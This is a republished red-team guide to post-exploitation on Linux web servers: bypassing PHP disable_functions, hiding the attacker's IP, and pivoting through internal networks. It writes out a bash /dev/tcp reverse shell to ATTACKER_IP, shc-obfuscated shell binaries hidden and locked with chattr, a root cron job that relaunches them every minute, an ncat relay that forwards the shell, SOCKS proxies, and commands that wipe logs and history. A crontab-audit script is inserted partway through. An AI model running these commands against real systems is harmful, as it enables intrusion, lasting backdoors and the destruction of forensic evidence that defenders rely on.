Bypassing PHP disable_functions and Building Encrypted Reverse Shells: A Hands‑On Guide

This article walks through practical techniques for bypassing PHP's disable_functions, hiding attacker IPs, creating encrypted bash reverse shells, maintaining persistence with cron and screen, probing outbound ports, setting up internal network proxies, and cleaning forensic traces, all aimed at penetration testing and red‑team operations.

MaGe Linux Operations

Bypassing PHP disable_functions

Use the official AntSword bypass plugin for automatic evasion, or manually try the repository at AntSword‑Labs/bypass_disable_functions if automatic bypass fails.

Check the web application's stored database credentials and explore file write or log write possibilities for privilege escalation if bypass fails.

Hiding Attack IP

Hide the attacking IP using CDN services or cloud functions; note that accessing foreign servers may be restricted, and using domestic cloud providers may require real‑name registration and incur costs.

Encrypted Bash Reverse Shell

Standard reverse shell command:

bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1

Receive it on the attacker with netcat:

nc -lvvp ATTACKER_PORT

Encrypt the bash script with shc, which generates a C source file and a compiled binary. Transfer the binary to the target and execute it.

./shc -Uvrf reverse.sh -o reverse
./reverse

If commands like bash or nc are blocked, first try privilege escalation, then test outbound connectivity by probing common ports with nmap --top-ports 100 or 1000.

Testing Outbound Ports

Modify an existing nginx configuration to add a new listen port, then create a shell script that curls each candidate port on your VPS, run it on the target, and examine the results.

listen NEW_PORT;
curl vps:PORT
./shfile > result.txt

Upgrading to a Full Interactive Shell

After receiving a limited shell, upgrade it with:

python -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo
export SHELL=bash
export TERM=xterm-256color

Use screen to keep the session alive:

screen -S session_name
Ctrl‑a, Ctrl‑d   # detach
screen -r session_name   # reattach
exit   # terminate a screen

Privilege Escalation and Persistence

Gather system information from /proc/version and /etc/*-release, search Exploit‑DB for relevant exploits, and compile needed binaries locally if the target cannot compile.

For persistence, use cron jobs. Upload the encrypted binary, make it executable, hide it (prefix with a dot), and lock it with chattr +i. Add a cron entry:

* * * * * root /path/to/.binary

Non‑root users should edit their crontab with crontab -e. Ensure the cron environment defines SHELL, PATH, and disables email notifications with MAILTO="".
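From the defender's side, the cron persistence described above leaves a recognisable pattern in system crontab files. The following is an added example, not part of the original article: a small audit of /etc/crontab-format text for those traits, where the function name, the sample lines and the paths in them are constructed for illustration.

```python
import re

# Constructed sample in /etc/crontab format (schedule, user, command); not from a real host.
SAMPLE_CRONTAB = '''\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=""
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root /var/tmp/.cache-update
*/5 * * * * www-data /usr/bin/php /var/www/app/cron.php
'''

ENV_RE = re.compile(r'^([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*)$')

def audit_system_crontab(text):
    """Return [(line_no, reasons)] for entries showing the traits the article lists."""
    findings, mail_silenced = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        env = ENV_RE.match(line)
        if env:  # environment lines apply to the entries that follow them
            if env.group(1) == "MAILTO" and env.group(2).strip().strip("\"'") == "":
                mail_silenced = True
            continue
        fields = line.split(None, 6)
        if len(fields) < 7:
            continue  # @reboot-style and malformed lines are out of scope here
        schedule, user, command = fields[:5], fields[5], fields[6]
        reasons = []
        if schedule == ["*"] * 5:
            reasons.append("runs every minute")
        if any(w.startswith("/") and w.rsplit("/", 1)[1].startswith(".") for w in command.split()):
            reasons.append("executes a dot-prefixed (hidden) file")
        if reasons and user == "root":
            reasons.append("runs as root")
        if reasons and mail_silenced:
            reasons.append('MAILTO="" suppresses cron mail')
        if reasons:
            findings.append((no, reasons))
    return findings

if __name__ == "__main__":
    for line_no, why in audit_system_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no}: " + "; ".join(why))
```

On a live host, feed the function the contents of /etc/crontab and the files under /etc/cron.d, and check each flagged path with lsattr for the immutable (i) attribute set by chattr +i.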

Internal Network Pivoting

Perform port scanning with nmap or the recommended fscan. Set up a SOCKS5 proxy using frp (client on the target, server on your VPS) or Neo‑reGeorg by uploading a PHP/JSP payload.

For targets that cannot reach the internet, forward the reverse shell through an intermediate machine using ncat:

ncat -l LOCAL_PORT -c 'ncat ATTACKER_IP ATTACKER_PORT'

Trace Cleaning

Clear logs and command history aggressively (use with caution):

echo -n > /var/log/syslog
... (repeat for other log files)
history -c
echo > ~/.bash_history
HISTSIZE=0

Note that complete removal is difficult and may leave artifacts.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
